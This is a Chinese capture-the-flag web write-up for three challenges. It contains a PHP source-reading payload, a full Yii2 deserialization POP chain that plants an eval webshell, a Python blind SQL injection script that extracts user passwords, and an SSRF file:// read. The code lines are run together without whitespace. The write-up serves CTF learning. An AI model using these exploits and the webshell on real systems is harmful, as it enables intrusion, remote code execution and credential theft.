前言

记录一下web的wp，随手写的，只会前三题，确实都很简单。

find_it

扫到robots.txt，发现1ndexx.php，直接访问不了，访问.1ndexx.php.swp得到源码，然后读flag：

?code=<?= show_source(glob('./*')[2]);

再访问hack.php：

base32解密一下即可得到flag。

framework

是个yii2的框架，扫出来www.zip下载源码，找到了反序列化的路由，yii2的反序列化之前审过了，直接拿POC打：

<?phpnamespace yii\\rest{class IndexAction{public $checkAccess;public $id;public function __construct(){$this->checkAccess = 'assert';$this->id = 'file_put_contents("feng.php","<?php eval(\\$_POST[0]);?>");exit();';}}}namespace yii\\db{use yii\\web\\DbSession;class BatchQueryResult{private $_dataReader;public function __construct(){$this->_dataReader=new DbSession();}}}namespace yii\\web{use yii\\rest\\IndexAction;class DbSession{public $writeCallback;public function __construct(){$a&#6200001;new IndexAction();$this->writeCallback=[$a,'run'];}}}namespace{use yii\\db\\BatchQueryResult;echo base64_encode(serialize(new BatchQueryResult()));}

蚁剑连上去feng.php，然后拿出绕过disable_functions的插件，直接秒，然后

/readflag

：

WebsiteManger

f12看到

<div class="avtar"><img src="image.php?id=3" width="200" height="200"/></div>

所以

image.php

存在SQL注入，经过一系列fuzz，写个python脚本跑一下：

"""Author:feng"""import requestsurl='http://eci-2zefme7yqvztlaat6my5.cloudeci1.ichunqiu.com/image.php'flag=''for i in range(1,100):length=len(flag)min=32max=128while 1:j=min+(max-min)//2if min==j:flag+=chr(j)print(flag)break#payload="if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),{},1))<{},sleep(0.5),1)".format(i,j)#payload="0/**/or/**/if(ascii(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{},1))<{},1,0)".format(i,j)#payload="0/**/or/**/if(ascii(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='users'),{},1))<{},1,0)".format(i,j)payload="0/**/or/**/if(ascii(substr((select/**/group_concat(password)from/**/users),{},1))<{},1,0)".format(i,j)params={'id':payload}r=requests.get(url=url,params=params)#print(r.text)if len(r.text)>200:max=jelse :min=j"images,users""username,password""admin"  "d6ec745f9d22e6a9ee099"

然后直接登录，curl.php似乎是SSRF，直接读/flag：

host=file%3A%2F%2F%2Fflag&referer=